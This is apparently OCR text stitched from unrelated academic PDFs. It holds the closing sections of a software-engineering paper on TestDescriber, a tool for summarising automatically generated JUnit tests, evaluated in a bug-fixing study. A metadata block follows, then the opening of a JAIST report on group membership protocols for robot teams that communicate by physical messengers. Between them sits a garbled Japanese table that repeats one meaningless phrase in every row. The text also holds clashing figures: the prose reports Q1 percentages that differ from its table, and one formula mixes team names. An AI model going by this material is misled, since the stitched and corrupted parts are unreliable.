<td>0.50</td>
<td>0.65</td>
<td>0.86</td>
<td>-</td>
<td>-</td>
</tr>
<tr>
<td>Statement Cov.</td>
<td>With</td>
<td>0.52</td>
<td>0.68</td>
<td>0.83</td>
<td>0.83</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.61</td>
<td>0.68</td>
<td>0.85</td>
<td>-</td>
<td>-</td>
</tr>
<tr>
<td>Branch Cov.</td>
<td>With</td>
<td>0.54</td>
<td>0.68</td>
<td>0.82</td>
<td>0.87</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.58</td>
<td>0.67</td>
<td>0.82</td>
<td>-</td>
<td>-</td>
</tr>
<tr>
<td>Mutation Score</td>
<td>With</td>
<td>0.13</td>
<td>0.29</td>
<td>0.45</td>
<td>0.45</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.13</td>
<td>0.30</td>
<td>0.52</td>
<td>-</td>
<td>-</td>
</tr>
</tbody>
</table>
**Table 4: Statistics for the test suites edited by the participants for Rational**
<table>
<thead>
<tr>
<th>Variable</th>
<th>Factor</th>
<th>Min</th>
<th>Mean</th>
<th>Max</th>
<th>p-value</th>
<th>$A_{12}$</th>
</tr>
</thead>
<tbody>
<tr>
<td>Method Cov.</td>
<td>With</td>
<td>0.89</td>
<td>0.97</td>
<td>1.00</td>
<td>1.00</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.92</td>
<td>0.97</td>
<td>1.00</td>
<td>1.00</td>
<td>-</td>
</tr>
<tr>
<td>Statement Cov.</td>
<td>With</td>
<td>0.85</td>
<td>0.86</td>
<td>0.90</td>
<td>0.89</td>
<td>-</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.85</td>
<td>0.86</td>
<td>0.90</td>
<td>0.89</td>
<td>-</td>
</tr>
<tr>
<td>Mutation Score</td>
<td>With</td>
<td>0.52</td>
<td>0.71</td>
<td>0.93</td>
<td>0.08</td>
<td>0.69 (M)</td>
</tr>
<tr>
<td></td>
<td>Without</td>
<td>0.31</td>
<td>0.61</td>
<td>0.89</td>
<td>-</td>
<td>-</td>
</tr>
</tbody>
</table>
**RQ2** Test case summaries do not influence how the developers manage the test cases in terms of structural coverage.
5. DISCUSSION AND LESSONS LEARNT
In the following, we provide additional, qualitative insights to the quantitative study reported in Section 4.
Summaries and comprehension. At the end of each task we asked each participant to evaluate the comprehensibility of the test cases (either with or without summary) using a Likert scale intensity from very-low to very-high (involving all the 30 participants). When posing this question we did not explicitly mention terms like "test summaries" but instead "test comments" to avoid biased answers by the participants. Figure 5 compares the scores given by participants to the provided test cases (i.e., generated by Evosuite) according to whether the tests were enriched (WITH) or not (WITHOUT) with summaries. We can notice that when the test cases were commented with summaries (WITH) 46% of participants labeled the test cases as easy to understand (high and very high comprehensibility) with only 18% of participants that considered the test cases as incomprehensible. Vice versa, when the test cases were not enriched with summaries (WITHOUT) only 15% of participants judged the test cases as easy to understand, while a substantial percentage of participants (40%) labeled the test case as difficult to understand. The Wilcoxon test also reveals that this difference is statistical significant (p-value = 0.0050) with a positive and medium effect size (0.71) according to the Vargha-Delaney $\hat{A}_{12}$ statistic. Therefore, we can argue that “Test summaries statistically improve the comprehensibility of automatically generated test case according to human judgments.”
Post-test Questionnaire. Table 5 reports the results to questions from the exit survey. The results demonstrate that in most of the cases the participants considered the test summaries (when available) as the most important source of information to perform the tasks after the source code itself, i.e., the code of the target classes to fix. Indeed, when answering Q1 and Q2 the most common opinion is that the source code is the primary source of information (47% in Q1 and 43% of the opinions in Q2), followed by the test summaries (20% in Q1 and 53% in Q2). In contrast, participants deem the actual test cases generated by Evosuite to be less important than (i) the test summaries and (ii) the test cases they created themselves during the experiment. As confirmation of this finding, we received positive feedback from both junior and more experienced participants, such as “the generated test cases with comments are quite useful” and “comments give me [a] better (and more clear) picture of the goal of a test.”
From Table 5 we can also observe that participants mainly considered the tests generated by Evosuite as a starting point to test the target classes. Indeed, these tests must be updated (e.g., checking the assertions) and enriched with further manually written tests (Q3), since in most of the cases they test the easier part of the program under tests (according to 80% of opinions for Q8). Automatically generated tests are in most of cases (66% of participants) considered difficult to read and understand (Q4), especially if not enriched with summaries describing what they are going to test (Q5 and Q6).
Quality of the summaries. Finally, we ask the participants to evaluate the overall quality of the provided test summaries, similarly as done in traditional work on source code summarization [37, 48]. We evaluate the quality according to three widely known dimensions [37, 48]:
- **Content adequacy:** considering only the content of the comments of JUnit test cases, is the important information about the class under test reflected in the summary?
- **Conciseness:** considering only the content of the comments in the JUnit test cases, is there extraneous or irrelevant information included in the comments?
- **Expressiveness:**
Table 5: Raw data for exit questionnaire (SC=Source Code, TCS=TC Summaries, TC=Test Cases, and MTC=Manually written TC).
<table>
<thead>
<tr>
<th>Questions</th>
<th>SC</th>
<th>TCS</th>
<th>TC</th>
<th>MTC</th>
<th>Other</th>
</tr>
</thead>
<tbody>
<tr>
<td>Q1: What is the best source of information?</td>
<td>47%</td>
<td>30%</td>
<td>20%</td>
<td>5%</td>
<td>0%</td>
</tr>
<tr>
<td>Q2: Can you rank the specified sources of information in order of importance from 1(high) to 5(low)?</td>
<td>(rank 1) 43%</td>
<td>27%</td>
<td>27%</td>
<td>5%</td>
<td>0%</td>
</tr>
<tr>
<td></td>
<td>(rank 2) 17%</td>
<td>53%</td>
<td>30%</td>
<td>6%</td>
<td>0%</td>
</tr>
<tr>
<td></td>
<td>(rank 3) 27%</td>
<td>23%</td>
<td>33%</td>
<td>10%</td>
<td>7%</td>
</tr>
<tr>
<td></td>
<td>(high) to (low)</td>
<td>17%</td>
<td>17%</td>
<td>10%</td>
<td>57%</td>
</tr>
</tbody>
</table>
Table 6: Raw data of the questionnaire concerning the evaluation of TestDescriber summaries.
<table>
<thead>
<tr>
<th>Content adequacy</th>
<th>Percentage of Ratings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Response category</td>
<td></td>
</tr>
<tr>
<td>Is not missing any information.</td>
<td>50%</td>
</tr>
<tr>
<td>Missing some information.</td>
<td>37%</td>
</tr>
<tr>
<td>Missing some very important information.</td>
<td>13%</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Conciseness</th>
<th>Percentage of Ratings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Response category</td>
<td></td>
</tr>
<tr>
<td>Has no unnecessary information.</td>
<td>38%</td>
</tr>
<tr>
<td>Has some unnecessary information.</td>
<td>52%</td>
</tr>
<tr>
<td>Has a lot of unnecessary information.</td>
<td>10%</td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th>Expressiveness</th>
<th>Percentage of Ratings</th>
</tr>
</thead>
<tbody>
<tr>
<td>Response category</td>
<td></td>
</tr>
<tr>
<td>Is easy to read and understand.</td>
<td>70%</td>
</tr>
<tr>
<td>Is somewhat readable and understandable.</td>
<td>30%</td>
</tr>
<tr>
<td>Is hard to read and understand.</td>
<td>0%</td>
</tr>
</tbody>
</table>
• **Expressiveness**: considering only the way the comments of JUnit test cases are presented, how readable and understandable are the comments?
The analysis is summarized in Table 6. The results highlight that (i) 87% of the participants consider the TestDescriber comments adequate (they do not miss very important information); (ii) 90% of them perceive the summaries sufficiently concise as they contain no (38%) or only some unnecessary information (52%); (iii) 100% of participants consider the comments easy to read and/or somewhat readable. In summary, the majority of the participants consider the comments generated by TestDescriber very concise and easy to understand.
**Feedback.** Comments collected from the survey participants mentioned interesting feedback to improve TestDescriber summaries:
- **Redundant information from test to test**: developers of our study were concerned by the fact that for similar test cases TestDescriber generates the same comments and, as solution, they suggested to generate, for each assertion already tested in previous test methods, a new inline comment which specifies that the assertion was already tested in a previous test method.
- **Useless naming of test methods**: for several participants the name of the test does not give any hint about the method under test. They suggest to (i) “...rename the method names to useful names... so that it is possible to see at a glance what is actually being tested by that test case” or (ii) “...describe in the javadoc of a test method which methods of the class are tested.”
**Lessons Learnt.** As indicated in Section 4.2 test suites having high structural coverage are not necessarily more effective to help developers in detecting and fixing more bugs. Most automatic testing tools consider structural coverage as the main goal to optimize for, with the underlying assumption that higher coverage is strongly related to a test’s effectiveness [3]. However, our results seem to provide a clear evidence that this is not always true as also confirmed by the non-parametric Spearman \( \rho \) correlation test: the correlation between the number of bugs fixed and the structural coverage metrics is always lower than 0.30 for **ArrayIntList** and 0.10 for **Rational**. Only the mutation score has a correlation coefficient larger than 0.30 in both the two classes. On the other hand, the results of RQ1 provide clear evidence that the summaries generated by TestDescriber play a significant role even if they do not change the code and the structural coverage of the original test cases generated by Evosuite. Therefore, we can argue that comprehensibility or readability are two further dimensions that should be considered (together with structural coverage) when systematically evaluating automatic test generation tools.
6. **THREATS TO VALIDITY**
In this section, we outline possible threats to the validity of our study and show how we mitigated them.
**Construct Validity.** Threats to construct validity concern the way in which we set up our study. Due to the fact that our study was performed in a remote setting in which participants could work on the tasks at their own discretion, we could not oversee their behaviour. The metadata sent to us could be affected by imprecisions as the experiment was conducted offline. However, we share the experimental data with the participants using an online survey platform, which forces the participants (1) to perform tasks in the desired order and (2) to fill in the questionnaires. Therefore, participants only got access to the final questionnaire after they had handed in their tasks, as well as they could not perform the second task without finishing the first one. Furthermore, the online platform allows us to monitor the total time each participant spent on the experiment. We also made sure participants were not aware of the actual aim of the study.
**Internal Validity.** Threats to internal validity concern factors which might affect the causal relationship. To avoid bias in the task assignment, we randomly assigned the tasks to the participants in order to have the same number of data points for all classes/treatments. To ensure that a sufficient number of data points are collected for statistical significance tests, each participant performed two bug fixing tasks—one with test summaries and one without, on different classes—rather than one single task, to produce 60 data points in this study. The two Java classes used as objects for the two tasks have similar difficulty and can easily be tested in 45 minutes, even for intermediate programmers [23, 24]. Another factor that can influence our results is the order of assignments, i.e., first with summaries and then without summaries or vice versa. However, the two-way permutation test reveals that there is no significant interaction between the order of assignments and the two tasks on the final outcome, i.e., the number of bugs fixed (\( p\)-value = 0.7189).
**External Threats.** External threats concern the generalizability of our findings. We considered two Java classes already used in two previous controlled experiments investigating the effectiveness of automated test case generation tools compared to manual testing [23, 24]. We also use the same set of bugs injected using a mutation analysis tool, which is common practice to evaluate the effectiveness of testing techniques in literature [23, 24, 25]. We plan to evaluate TestDescriber with a bigger set of classes, investigating its usefulness in the presence of more complex branches. Future work also needs to address which aspects of the generated summaries are useful. Is the coverage summary useful to developers and if so, in what way?
Another threat can be that the majority of our study participants have an academic background. Recent studies have shown that students perform similarly to industrial subjects, so long as they are familiar with the task at hand [31, 38]. All our student participants had at least 3 years of experience with the technologies used in the study, see Section 3.2. Moreover, our population included a substantial part of professional developers and the median programming experience of our participants is 3-6 years. Nevertheless, we plan to replicate this study with more participants in the future in order to increase the confidence in the generalizability of our results.
**Conclusion Threats.** In our study we use TestDescriber to generated tests summaries for JUnit test cases generated by Evosuite. It might be possible that using different automatic test generation tools may lead to different results in terms of test case comprehensibility. However, we notice that (i) coverage, (ii) structure and (iii) size of test cases generated with Evosuite are comparable to the output produced by other modern test generation tools, such as Randoop [40], JCrasher [16], etc.
We support our findings by using appropriate statistical
tests, i.e. the non-parametric Wilcoxon test and the two-way permutation test to exclude that other co-factors (such as the programming experience) can affect our conclusion. We also used the Wilk-Shapiro normality test to verify whether the non-parametric test could be applied to our data. Finally, we used the Vargha and Delaney $\hat{A}$ statistical test to measure the magnitude of the differences between the different treatments.
7. RELATED WORK
In this section, we discuss the related literature on source code summarization and readability of test cases.
Source Code Summarization. Murphy's dissertation [39] is the earliest work which proposes an approach to generate summaries by analysing structural information of the source code. More recently, Sridhara et al. [47] suggested to use pre-defined templates of natural language sentences that are filled with linguistic elements (verbs, nouns, etc.) extracted from important method signature [19, 20]. Other studies used the same strategy to summarize Java methods [26, 34, 48], parameters [50], groups of statements [49], Java classes [37], services of Java packages [27] or generating commit messages [15]. Other reported applications are the generation of source code documentation/summary by mining text data from other sources of information, such as bug reports [42], e-mails [42], forum posts [17] and question and answer site (Q&A) discussions [53, 55].
However, Binkley et al. [7] and Jones et al. [46] pointed out that the evaluation of the generated summaries should not be done by just answering the general question "is this a good summary?" but evaluated "through the lens of a particular task". Stemming from these considerations, in this paper we evaluated the impact of automatically generated test summaries in the context of two bug fixing tasks. In contrast, most previous studies on source code summarization have been evaluated by simply surveying human participants about the quality of the provided summaries [7, 26, 34, 37, 47, 48].
Test Comprehension. The problem of improving test understandability is well known in literature [14], especially in the case of test failures [9, 57]. For example, Zhang et al. [57] focused on failing tests and proposed a technique based on static slicing to generate code comments describing the failure and its causes. Buse et al. [9] proposed a technique to generate human-readable documentation for unexpected thrown exceptions [9]. However, both these two approaches require that tests fail [57] or throw unexpected Java exceptions [9]. This never happens for automatically generated test cases, since the automatically generated assertions reflect the current behaviour of the class [24]. Consequently, if the current behaviour is faulty the generated assertions do not fail because they reflect the incorrect behaviour.
Kamimura et al. [32] argued that developers might benefit from a consumable and understandable textual summary of a test case. Therefore, they proposed an initial step towards generating such summaries based on static analysis of the code composing the test cases [32]. From an engineering point of view, our work resumes this line of research; however, it is novel for two main reasons. First of all our approach generates summaries combining three different levels of granularity: (i) a summary of the main responsibilities of the class under test (class level); (ii) a fine-grained description of each statement composing the test case as done in the past [32] (test level); (iii) a description of the branch conditions traversed in the executed path of the class under test (coverage level). As such, our approach combines code coverage and summarization to address the problem of describing the effect of test case execution in terms of structural coverage. Finally, we evaluate the impact of the generated tests summaries in a real scenario where developers were asked to test and fix faulty classes.
Understandability is also widely related with the test size and number of assertions [3]. For these reasons previous work on automatic test generation focused on (i) reducing the number of generated tests by applying a post-process minimization [21], and (ii) reducing the number of assertions by using mutation analysis [25], or splitting tests with multiple assertions [56]. To improve the readability of the code composing the generated tests, Daka et al. [18] proposed a mutation-based post-processing technique that uses a domain-specific model for unit test readability based on human judgement. Alshan et al. [1] investigates the use of a linguistic model to generate more readable input strings. Our paper shows that summaries represent an important element for complementing and improving the readability of automatically generated test cases.
8. CONCLUSION AND FUTURE WORK
Recent research has challenged the assumption that structural coverage is the only goal to optimize [1, 54], suggesting that understandability of test cases is a key factor to optimize in the context of automated test generation. In this paper we handle the problem of usability of automatic generated test cases making the following main contributions:
- We present TestDescriber a novel approach to generate natural language summaries of JUnit tests. TestDescriber is designed to automatically generate summaries of the portion of code exercised by each individual test case to provide a dynamic view of the CUT.
- To evaluate TestDescriber, we have set up an empirical study involving 30 human participants from both industry and academia. Specifically, we investigated the impact of the generated test summaries on the number of bugs actually fixed by developers when assisted by automated test generation tools.
Results of the study indicate that (RQ1) TestDescriber substantially helps developers to find more bugs (twice as many) reducing testing effort and (RQ2) test case summaries do not influence how developers manage test cases in terms of structural coverage. Additionally, TestDescriber could be used to automatically document tests, improving their readability and understandability. Results of our post-test questionnaire reveal that test summaries significantly improve the comprehensibility of test cases. Future work is directed towards different directions. We plan to further improve TestDescriber summaries by (i) considering the feedback received by the participants of our study, (ii) combining our approach with recent work that improves the readability of the code composing the generated test [18], (iii) complementing the generated summaries including further coverage criteria, such as branch or mutation coverage. Also, we aim to replicate the study involving additional developers.
|
{"Source-Url": "https://pure.tudelft.nl/portal/files/8927923/PID4080971.pdf", "len_cl100k_base": 14247, "olmocr-version": "0.1.53", "pdf-total-pages": 13, "total-fallback-pages": 0, "total-input-tokens": 43404, "total-output-tokens": 16488, "length": "2e13", "weborganizer": {"__label__adult": 0.0003657341003417969, "__label__art_design": 0.00026702880859375, "__label__crime_law": 0.0003066062927246094, "__label__education_jobs": 0.0014133453369140625, "__label__entertainment": 4.571676254272461e-05, "__label__fashion_beauty": 0.00015795230865478516, "__label__finance_business": 0.0001512765884399414, "__label__food_dining": 0.0002562999725341797, "__label__games": 0.000537872314453125, "__label__hardware": 0.0004854202270507813, "__label__health": 0.0003523826599121094, "__label__history": 0.0001837015151977539, "__label__home_hobbies": 8.034706115722656e-05, "__label__industrial": 0.00021564960479736328, "__label__literature": 0.0002307891845703125, "__label__politics": 0.0002143383026123047, "__label__religion": 0.00038051605224609375, "__label__science_tech": 0.0029754638671875, "__label__social_life": 9.828805923461914e-05, "__label__software": 0.004222869873046875, "__label__software_dev": 0.986328125, "__label__sports_fitness": 0.0002846717834472656, "__label__transportation": 0.000370025634765625, "__label__travel": 0.0001933574676513672}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 71127, 0.0427]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 71127, 0.46009]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 71127, 0.89918]], "google_gemma-3-12b-it_contains_pii": [[0, 0, null], [0, 9117, false], [9117, 12890, null], [12890, 19786, null], [19786, 25481, null], [25481, 32230, null], [32230, 38462, null], [38462, 45880, null], [45880, 51226, null], [51226, 58208, null], [58208, 64970, null], [64970, 64970, null], [64970, 71127, null]], "google_gemma-3-12b-it_is_public_document": [[0, 0, null], [0, 9117, true], [9117, 12890, null], [12890, 19786, null], [19786, 25481, null], [25481, 32230, null], [32230, 38462, null], [38462, 45880, null], [45880, 51226, null], [51226, 58208, null], [58208, 64970, null], [64970, 64970, null], [64970, 71127, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 71127, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 71127, null]], "pdf_page_numbers": [[0, 0, 1], [0, 9117, 2], [9117, 12890, 3], [12890, 19786, 4], [19786, 25481, 5], [25481, 32230, 6], [32230, 38462, 7], [38462, 45880, 8], [45880, 51226, 9], [51226, 58208, 10], [58208, 64970, 11], [64970, 64970, 12], [64970, 71127, 13]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 71127, 0.24779]]}
|
olmocr_science_pdfs
|
2024-12-10
|
2024-12-10
|
beb02e3718a874e54645b0db74a02150e3b4566e
|
<table>
<thead>
<tr>
<th>項目</th>
<th>内容</th>
</tr>
</thead>
<tbody>
<tr>
<td>テンポラリー</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>リリース</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>リリース</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>ページ</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>ページ</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>ページ</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>ページ</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>リリース</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
<tr>
<td>リリース</td>
<td>フェアリーテールの世界が現実化する可能性を示す新たな物理システムの提案</td>
</tr>
</tbody>
</table>
リサーチレポート(北陸先端科学技术大学院大学情報科学研究科)
Fault-Tolerant Group Membership Protocols using Physical Robot Messengers
Rami Yared\(^1\), Xavier Défago\(^{1,2}\), and Takuya Katayama\(^1\)
\(^1\)School of Information Science, Japan Advanced Institute of Science and Technology (JAIST)
\(^2\)PRESTO, Japan Science and Technology Agency (JST)
December 1, 2004
IS-RR-2004-019
Fault-tolerant group membership protocols using physical robot messengers
Rami Yared*, Xavier Défago*†, and Takuya Katayama*
*School of Information Science
Japan Advanced Institute of Science and Technology (JAIST)
1-1 Asahidai, Tatsunokuchi, Ishikawa 923-1292, Japan
†PRESTO, Japan Science and Technology Agency (JST)
Email: {r-yared,defago,katayama}@jaist.ac.jp
Abstract
In this paper, we study the group membership and view synchrony problem in a distributed system composed of a group of teams of mobile robots communicating by physical robot messengers.
Communication by robot messengers raises new issues and relevant fault tolerance techniques that are different from those in traditional distributed systems.
1 Introduction
In this paper, we define a distributed system composed of a group of teams of cooperative autonomous mobile robots, communications between teams take place by sending physically a robot messenger from the team sender to the team receiver. A distributed system composed of teams of autonomous mobile robots communicating by robot messengers has distinct aspects and issues that are different of those in conventional distributed systems.
comparison with traditional distributed systems: a team of mobile robots maps to a process in traditional distributed system, with a difference that a team can not send any message, if its pool of messengers is empty, unless it receives a messenger from another team, while a process can send messages at any time.
Obviously, communications by messengers take longer delays and larger transmission time between nodes, compared to conventional communication media such as radio, electric signals, and infrared beams.
A remarkable advantage of teams of mobile robots, is that a robot messenger has enough memory to carry any quantity of available of messages from a team source to a team destination, in contrast to bandwidth limitations for communication channels in traditional distributed systems.
Concerning fault-tolerance aspects, we assume in this paper that either teams or messengers fail by crash. a team failure maps to a process failure, and a messenger failure corresponds to lossy channels, with the major difference resides in fault-tolerant techniques. In order to tolerate a bounded number of faulty messengers, the team sender sends a set of messengers such that its cardinality is greater than the maximal number of faulty messengers in the system, so this method guarantees a reliable communication channel.
On the other hand, there is a particular failure detection technique that is relevant to distributed system composed of teams of mobile robots communicating by messengers, that is different from conventional failure detection mechanisms. It is well-known that it
is impossible to correctly and deterministically detect a process crash in purely asynchronous distributed systems [5], because it is impossible to distinguish between a crashed process and a very slow one. But in a context of robots communicating by physical messengers, the detection of a crashed team occurred locally on its site, by at least one correct messenger, and consequently the system is augmented with some perfect failure detector.
**Example** Let us illustrate the motivations of this approach with a simple example. Consider a distributed application composed of a group of teams of cooperative mobile robots searching mineral objects inside a mine. In this underground application there is no established radio communications infrastructure, also it is not practical at all to establish any radio communication system like (e.g., [2]) in this environment. Using ultrasonic sound media in this situation is not feasible. On the other hand communicating by infrared technology (e.g., [7]) can solve the problem of the absence of radio communication infrastructure, but it needs a line-of-sight between communicating robots, and signals could be interrupted because of moving obstacles.
So, it is convenient to communicate by physical robot messengers in such applications, and also in similar environments, like underwater and spatial applications. Also, communications by messengers could be used to tolerate catastrophic crashes of a whole radio or infrared communicating system between teams of robots.
**Group Membership and View Synchrony** In a distributed system composed of teams of mobile robots, with presence of failures, it is desirable to establish a group membership and view synchrony protocol to:
- Allow teams to join and/or leave a group in a consistent manner.
- Enable teams to install a new view such that all teams in the system agree on every new installed view.
So, a group membership and view synchrony protocol must generate an ordered sequence of consistent views.
**Definitions** We define a group as a set of teams which are said to be members of the group. A team becomes a group member by requesting to *join* the group; it can cease being a member by requesting to *leave* the group. A view is the output of membership service, consisting of the list of the current members in the group, and a sequence number.
**Contribution** In this paper, we define a distributed system composed of teams of cooperative autonomous mobile robots, such that the inter-team communications “communications between teams” occur by sending robot messengers.
We assume that the system is completely connected, so there exists a “communication route” between each pair of teams, and every team has a pool of robot messengers for sending messages to other teams. In our system model, a group is a set of teams communicating by robot messengers, we present and discuss a distributed algorithm which is the group membership and view synchrony in this system model prone to messenger failures and team failures.
We handle the *join* of a new team to a group, the *leave* of a team, the establishment and confirmation of a new view in the system. We discuss three models of failures, the first model assumes that messengers and teams are both correct, the second model handles the failures of messengers assuming that all the teams are correct, and the third is the most general model in which we consider both messengers and teams failures.
We present a group membership algorithm and give arguments showing its correctness, then we evaluate briefly the required energy and time, to run the algorithm in each failure model.
**Related work** There exists group membership and view synchrony protocols for conventional distributed systems. Schemmer et al. [9] developed an architecture allowing mobile systems to schedule shared
resource in real-time based on wireless communications, they present two membership protocols which allow mobile systems to join and leave a group with predictable delay at any time, these protocols dynamically allocate bandwidth to joining stations. Their approach aimed at solving the problem of congestion in traffic control systems. Briefly, many protocols has been presented (e.g., [1, 4, 8, 9]) based on different scheduling techniques to allocate shared resources such as the bandwidth to joining stations for dynamically changing groups.
Abstractions of the existing protocols concerning group membership and view synchrony for traditional distributed systems, cannot be adapted to our distributed system model. On the other hand, the mobile agents approach is based on software migration, consequently this agent could be easily replicated, but in our model a messenger is a physical entity. Mobile agents approach does not meet our system model and requirements.
Structure The rest of the paper is organized as follows. Section 2 describes the system model and the basic concepts and assumptions. Section 3 describes the three failure models, the failure-free, messengers failure, and both teams/messengers failure models. Section 4 describes our group membership algorithm with correctness arguments and behavior evaluation for each failure model, and Section 5 concludes the paper.
2 System model & definitions
2.1 System model
We consider a distributed system composed of a group of $n$ teams of autonomous mobile robots and $m$ messengers. $n$ and $m$ are $> 1$. These teams cooperate with each other to achieve a required task determined by the upper layer. The system is purely asynchronous, so there exists no bounds neither on the speeds of processing information by teams, nor on the messages delays. Teams communicate between each other by exchanging robot messengers. Figure 1 illustrates our system model.
We assume that there exists a “communication route” between each pair of teams, such that each team can communicate directly with other teams, and the system is completely connected.
The system $(S)$ is a group of teams $S = \{T_1, T_2, \ldots, T_n\}$. Every team has an identifier, a set of robots named “workers” responsible for executing the required tasks, and a pool of robot messengers.
In this model, a robot messenger is ready to transmit messages on behalf of its team and also on behalf of other teams, and we assume that the capacity of memory of a messenger is large enough such that it can carry all available messages.
When a team receives a message, the cardinality of its pool is incremented by one, and it is decremented by one when it sends a message. We assume that each messenger has enough energy to move two hops at most, after that it requires a power supply from any team in the system.
2.2 Metrics
In addition to the complexity metrics used in traditional distributed systems, we consider a new metric that we call energy complexity.
Roughly speaking, the energy complexity of an algorithm $A$ measures the total amount of energy spent by a single run of the algorithm. The energy is evaluated by counting the number of hops\footnote{We call “hop” the journey from one team to another made by some messenger.} that must be made by messengers until the algorithm terminates.
### 2.3 Group membership & view synchrony
The membership service maintains a list of currently active connected processes, in failure-prone distributed systems, and delivers this information to the application whenever it changes. The reliable multi-cast services deliver messages to the current view members. For more information on the subject, we refer to the survey of Chockler et al. \cite{3}. A group membership can also be seen as a high-level failure detection mechanism that provides consistent information about suspicions and failures \cite{6, 10}. In short, a group membership keeps a track of what a process belongs to the distributed computation and what process does not.
In a distributed system composed of teams of robots communicating by messengers, a group membership service provides a list of non-crashed teams that currently belong to the system, and satisfies three properties: validity, agreement and termination. Validity is explained as follows: let $v_i$ and $v_{i+1}$ be two consecutive views, if a team $T_i \in v_i \setminus v_{i+1}$ then some team has executed $\text{leave}(T_i)$ and if a team $T_i \in v_{i+1} \setminus v_i$ then some team has executed $\text{join}(T_i)$. The agreement property ensures that the same view would be installed by all the teams of the group (agreement on the view) since agreement on uniquely identified views is necessary for synchronizing communications. The termination means that if team $T_i$ executes $\text{join}(T_q)$, then unless $T_i$ crashes, eventually a view $v'$ is installed such that either $T_q \in v'$ or $T_p \notin v'$. We present the following notations used in the paper:
- $|T_i|$ is the number of messengers exist in the pool of the team $T_i$.
- initiator is the team which proposes (join) or a (leave) operation, and consequently initiates a procedure of creating a new view.
- logical ring is a logical circular list of teams identifiers.
- $v_{ini}$ is the initial view of the system.
- $v_{act}$ is the current view of the system.
- $v_{fin}$ is the resulting view of the system.
### 3 Failure Models
We consider that a messenger and a team fail by “crash”, and discuss three possible models of failure. In the Model A, we assume that all messengers and teams are correct. In Model B we consider the crash of messengers only, but all the teams are correct. We present the most general case by the Model C, which considers both teams and messengers crashes.
#### 3.1 Model A: Failure-free
Model A considers the case of failure free, in this model there are neither crash of messengers, nor crash of teams. Model A is specified by the the two following properties:
- property A1: All messengers are correct.
- property A2: All teams are correct.
#### 3.2 Model B: Messenger failure
In this model, we consider the failures of messengers only, so a robot messenger may fail by crash while it moves between teams carrying messages. (no crash of teams in Model B).
We assume that number of faulty messengers is bounded, and denote this upper bound by $\overline{M}$. We present the following notations used in the paper:
- property B1: A messenger can fail by crash, and when it crashes, this crash is permanent.
- property B2: A whole team of robots never crashes, so all the teams in the system are correct.
3.3 Model C: Team/messenger failure
In this model, the system contains some faulty teams and some faulty messengers. We assume that the number of faulty teams and faulty messengers is bounded, we denote the maximal number of faulty (teams, messengers) in the system by: \((T, M)\).
In this model we have the following properties:
- **Property C1**: A whole team(s) may fail by crash and when a team crashes, this crash is permanent.
- **Property C2**: A correct messenger never crashes while doing its jobs by carrying messages between teams, but if its team has crashed and it was inside it at the moment of crash, then the correct messenger crashes with its team. 3 Correct messengers that were outside their teams never crash.
- **Property C3**: The crash of a team implies the crash of all the robots inside that team, the crashed robots can be classified in two categories: the workers of the crashed team, and its messengers either faulty or correct which are still inside the team at the moment of crash.
- **Property C4**: There is at least one correct team, and at least one correct robot messenger in the system, we can express this condition as follows: \(T < n\) and \(M < m\).
- **Property C5**: Any set composed of \(T\) teams, should contain totally at most \(m - M - 1\) robots messengers, at any instant. This condition can be formalized as follows: \(\sum_{k=1}^{T} |T_k| \leq m - M - 1\).
The intuition underlying this condition (property C5) is the following: it guarantees that there still exists at least one correct robot messenger in the system if \(T\) simultaneous crashes occurred.
4 Group Membership and View Synchrony algorithms
In this section, we study the problem of group membership and view synchrony in our system model, considering the three precedent failure models. The algorithms for models (A, B, C) are presented in the appendix.
For each failure model, we give a brief explanation and illustrate our algorithm by an example, then we give arguments showing its correctness, and finally we evaluate the energy and time required to run the algorithm.
We represent the system as a logical ring of nodes sorted by increasing order of teams identifiers, each node in the list represents a team of robots, the initial view contains all the teams in the system.
4.1 Group membership & failure-free (Model A)
We study the group membership and view synchrony in our system model, free of failures.
